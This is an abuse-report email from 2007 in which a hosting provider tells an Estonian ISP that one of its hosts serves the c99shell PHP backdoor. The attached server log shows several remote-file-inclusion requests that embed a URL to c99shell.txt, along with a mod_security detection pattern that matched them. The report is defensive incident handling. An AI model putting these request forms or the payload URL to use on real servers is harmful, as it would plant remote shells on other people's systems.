-----Original Message-----
From: Piney@essexhosting.com [mailto:Piney@essexhosting.com] 
Sent: Sunday, June 24, 2007 10:14 AM
To: jo@tradenet.ee
Subject: Malicious Program hosted by [195.222.18.109]

jo@tradenet.ee

Resolving: no.spam.ee... 195.222.18.109
====================

The enclosed log shows evidence that the machine having IP address
195.222.18.109 is
being used as a source of software to launch attacks against other systems.

Please note the entries in the log where the web address, "no.spam.ee",
is being used as the target for downloads of the file, [c99shell.txt].

=========================
The file, 'c99shell.txt', is available for download from "no.spam.ee".

PHP/C99Shell is a backdoor Trojan for platforms with PHP support, such as
web servers.
PHP/C99Shell listens for commands from a remote user.
The destructive tools available to the remote user once 'c99shell' is
installed on a 
compromised computer are many and varied.
=========================

The IP address of the system reporting this attack is 72.232.215.26.
The destination port was TCP/80.
Times listed are UTC and are accurate.

We understand that this IP address was not involved as the address launching
the attack.
It is being used by the attack script as its store of attack weapons.
The organizations responsible for the source of the attacks, have also been
notified of this incident.

This use of the system having IP address 195.222.18.109 is a probable
violation of your
Acceptable Use Policy.
Please deal with this incident in accord with that policy.


Please deal with this incident in accord with your Acceptable Use Policy.

Thank you

Piney@essexhosting.com

72.232.215.26 (essexhosting.net) Server Log:

IP addresses obfuscated for privacy.

[Sat Jun 23 06:33:33 2007] [error] [client [xxx.xxx.xxx.xxx]] mod_security:
Access allowed. 
Pattern match "/c99shell\\\\.txt" at REQUEST_URI [severity "EMERGENCY"]
[hostname 
"www.malwarebytes.org"] [uri
"/rogueremover.phphttp://no.spam.ee/~tonu/phpshell/c99shell.txt?"]

[xxx.xxx.xxx.xxx] - - [23/Jun/2007:06:05:42 +0000] "GET 
/rogueremover.phphttp://no.spam.ee/~tonu/phpshell/c99shell.txt? HTTP/1.1"
404 525 ";)" 
"Firefox/2.0.0.3" (malwarebytes.org) "-"

[xxx.xxx.xxx.xxx] - - [23/Jun/2007:06:33:33 +0000] "GET 
/rogueremover.phphttp://no.spam.ee/~tonu/phpshell/c99shell.txt? HTTP/1.1"
404 525 ";)" 
"Firefox/2.0.0.3" (malwarebytes.org) "-"

[Sat Jun 23 22:59:49 2007] [error] [client [xxx.xxx.xxx.xxx]] mod_security:
Access allowed. 
Pattern match "/c99shell\\\\.txt" at REQUEST_URI [severity "EMERGENCY"]
[hostname 
"www.malwarebytes.org"] [uri
"/aboutbuster.phphttp://no.spam.ee/~tonu/phpshell/c99shell.txt?"]

[Sat Jun 23 23:01:01 2007] [error] [client [xxx.xxx.xxx.xxx]] mod_security:
Access allowed. 
Pattern match "/c99shell\\\\.txt" at REQUEST_URI [severity "EMERGENCY"]
[hostname 
"www.malwarebytes.org"] [uri
"/qoofix.phphttp://no.spam.ee/~tonu/phpshell/c99shell.txt?"]